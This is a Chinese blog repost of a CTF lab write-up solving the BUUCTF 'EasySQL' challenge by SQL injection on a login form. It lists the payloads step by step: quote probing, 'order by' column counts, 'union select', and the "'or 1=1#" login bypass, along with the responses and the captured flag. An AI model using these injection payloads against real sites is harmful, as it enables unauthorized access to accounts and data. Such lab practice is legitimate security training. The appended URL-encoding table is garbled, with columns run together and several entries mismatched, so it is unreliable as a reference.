欢迎访问 生活随笔!

生活随笔

当前位置: 首页 > 运维知识 > 数据库 >内容正文

数据库

BUUCTF-WEB:[极客大挑战 2019]EasySQL 1(收藏了URL编码表)

发布时间:2025/3/15 数据库 47 豆豆
生活随笔 收集整理的这篇文章主要介绍了 BUUCTF-WEB:[极客大挑战 2019]EasySQL 1(收藏了URL编码表) 小编觉得挺不错的,现在分享给大家,帮大家做个参考.

点击链接进入环境发现是一个登录界面
我的思路:
第一步、测试注入点(tips:利用单引号,and 1=1, or 1=1之类的,%23为#注释符的url编码)判断是字符型还是数字型

payload:username=1' &password=123(SQL tyntax)

payload:username=1' %23&password=123(说明存在注入点)


第二步、利用order by查表的列数

payload:username=1' order by 1%23&password=123(NO,Wrong username password!!!)
payload:username=1' order by 2%23&password=123(NO,Wrong username password!!!)
payload:username=1' order by 3%23&password=123(NO,Wrong username password!!!)
payload:username=1' order by 4%23&password=123(Unknown column '4' in 'order clause')
说明表只有四列

第三步、如有回显,找到回显位(回显,就是显示正在执行的批处理命令及执行的结果等)
 

payload:username=1' union select 1,2,3%23&password=123

flag{cb71f2ab-7fea-42d9-bf34-41755337fada}
发现在查找回显位的这一步就出现了flag,都用不到爆库

第四步、利用union select 爆库、爆表、爆字段名、爆值
 

看大佬wp发现还有一种更简单的方法:

实际上这道题是登录成功就可以拿到flag
在用户名和密码都填:
payload:'or 1=1#
由于用户名和密码都存在sql注入漏洞,可以用'闭合前面的查询语句同时用or绕过判断

 

 

★URL编码表:

backspace8%A41%a61%§%A7Õ%D5 
tab9%B42%b62%«%ABÖ%D6 
linefeed%0AC43%c63%¬%ACØ%D8 
creturn%0DD44%d64%¯%ADÙ%D9 
space20%E45%e65%º%B0Ú%DA 
!21%F46%f66%±%B1Û%DB 
"22%G47%g67%ª%B2Ü%DC 
#23%H48%h68%,%B4Ý%DD 
$24%I49%i69%µ%B5Þ%DE 
%25%J%4Aj%6A»%BBß%DF 
&26%K%4Bk%6B¼%BCà%E0 
'27%L%4Cl%6C½%BDá%E1 
(28%M%4Dm%6D¿%BFâ%E2 
)29%N%4En%6EÀ%C0ã%E3 
*%2AO%4Fo%6FÁ%C1ä%E4 
+%2BP50%p70%Â%C2å%E5 
,%2CQ51%q71%Ã%C3æ%E6 
-%2DR52%r72%Ä%C4ç%E7 
.%2ES53%s73%Å%C5è%E8 
/%2FT54%t74%Æ%C6é%E9 
030%U55%u75%Ç%C7ê%EA 
131%V56%v76%È%C8ë%EB 
232%W57%w77%É%C9ì%EC 
333%X58%x78%Ê%CAí%ED 
434%Y59%y79%Ë%CBî%EE 
535%Z%5Az%7AÌ%CCï%EF 
636%      ð%F0 
737%?%3F{%7BÍ%CDñ%F1 
838%@40%|%7CÎ%CEò%F2 
939%[%5B}%7DÏ%CFó%F3 
:%3A\%5C~%7EÐ%D0ô%F4 
;%3B]%5D¢%A2Ñ%D1õ%F5 
%3C^%5E£%A3Ò%D2ö%F6 
=%3D_%5F¥%A5Ó%D3÷%F7 
%3E`60%|%A6Ô%D4ø%F8 
        ù%F9 

 

 

 

 

总结

以上是生活随笔为你收集整理的BUUCTF-WEB:[极客大挑战 2019]EasySQL 1(收藏了URL编码表)的全部内容,希望文章能够帮你解决所遇到的问题。

如果觉得生活随笔网站内容还不错,欢迎将生活随笔推荐给好友。